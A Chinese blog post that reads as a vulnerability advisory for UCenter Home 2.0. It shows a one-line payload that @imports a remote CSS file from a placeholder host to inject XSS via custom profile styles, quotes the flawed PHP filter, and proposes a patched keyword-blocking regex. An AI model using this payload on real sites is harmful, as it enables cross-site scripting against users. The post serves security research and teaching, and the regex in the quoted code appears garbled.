PHP笔记网

革命尚未成功,同志仍须努力下载JDK17

作者:Albert.Wen  添加时间:2012-05-29 23:04:34  修改时间:2024-10-27 06:53:23  分类:16.编程基础/Web安全  编辑

发布时间2010-09-03

影响版本uchome 2.0

漏洞描述看源码分析的,出错位置较敏感,而且基本没有利用限制,个人主页自定义风格时,可@import外部css文件

测试方法

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

以下在uchome 简体utf-8 2.0测试IE6,IE7,IE8通过.

@import url(http://xxx.com/1.css); 包含远程css文件,可以在1.css中写入XSS利用.

分析代码 cp_theme.php 92行(17行调用)

function checksecurity($str) {

	//执行一系列的过滤验证是否合法的CSS
	$filter = array(
		'//*[

]*(.+?)[

]**//is',
		'/[^a-z0-9]+/i',
	);

	$str = preg_replace($filter, '', $str); //过滤是过滤了,但只用于判断,没对源输入起作用

	if(preg_match("/(expression|implode|javascript)/i", $str)) { //并没有对import、http等进行检测
		showmessage('css_contains_elements_of_insecurity');
	}

	return true;
}

安全建议:

临时解决方法

implode应该是import的笔误

/(expression|vbscript|javascript|import)/i